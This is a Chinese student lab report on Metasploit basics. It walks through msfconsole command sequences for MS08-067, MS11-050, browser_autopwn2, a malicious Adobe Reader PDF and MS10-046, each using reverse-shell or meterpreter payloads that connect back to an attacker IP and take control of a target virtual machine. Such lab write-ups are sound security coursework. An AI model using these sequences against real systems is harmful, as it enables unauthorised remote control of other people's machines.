Exp5:MSF基础应用
一、基础问题回答
(1)用自己的话解释什么是 exploit , payload , encode.
exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。
payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。
encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。
二、实践过程
-
1.Windows服务渗透攻击——MS08-067安全漏洞
-
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp//tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161//攻击机ip
msf exploit(ms08_067_netapi) > set LPORT 5213//攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161//靶机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0//自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit//攻击
-
此时需要关闭靶机的防火墙,不然会出现
ConnectionTimeOut的失败;
-
攻击成功后的结果:
-
-
2.浏览器渗透攻击——MS11-050
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http//http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161//攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213//攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm//统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit
-
测试无法成功,总是会出现IE浏览器的错误,我觉得问题是出在浏览器版本不对,不适合那个漏洞,既然如此,那就换个漏洞呗,下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
- ** 实施browser_autopwn模块 **
-
现在攻击机里进入msfconsole,然后分别输入
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.43.161
set URIPATH auto
show options
-
开始攻击,此时可以看到msf在不停的尝试不同的payload
-
尝试成功,输出了可被访问的URL
http://192.168.43.161:8080/auto并启动服务器;
-
在靶机浏览器上输入URL后,浏览器跳转到
http://192.168.43.161:8080/auto/FaOGsp上
-
回头看一下kali机,发现回连成功了,输入
session -i 2获取对话,此时,已经获得了靶机的控制权。
-
- ** 实施browser_autopwn模块 **
-
3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp//tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161//攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213//攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf//设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit//攻击-
将生成的pdf文件拷贝到靶机上。
-
在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler//进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp反向连接
msf exploit(handler) > set LHOST 192.168.43.161//攻击机ip
msf exploit(handler) > set LPORT 5213//攻击端口固定
msf exploit(handler) > exploit
- 在靶机上打开5213lzm.pdf文件:
- 攻击机显示攻击成功:
-
4.快捷方式图标漏洞——MS10-046
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48//攻击机ip
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp//tcp反向回连
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48//攻击机ip
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit//攻击
- 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
- 对于已建立好了会话,通过命令
sessions查看,并选择sessions -i 1,获得靶机控制权。
(PS)本次试验时间上跨度有点大,没能连贯的做完,第四个项任务是在ciscn结束之后做的,而此时的kali机已被折腾崩了,所以考了别人的虚拟机,继续做完了,这里的IP不是之前那个。
- 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
三、实践总结及体会
本次试验给我最深的感触就是msf的强大,活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,还是及时更新系统,填补漏洞,因为有一双研眼镜正在窥探你的笔记本。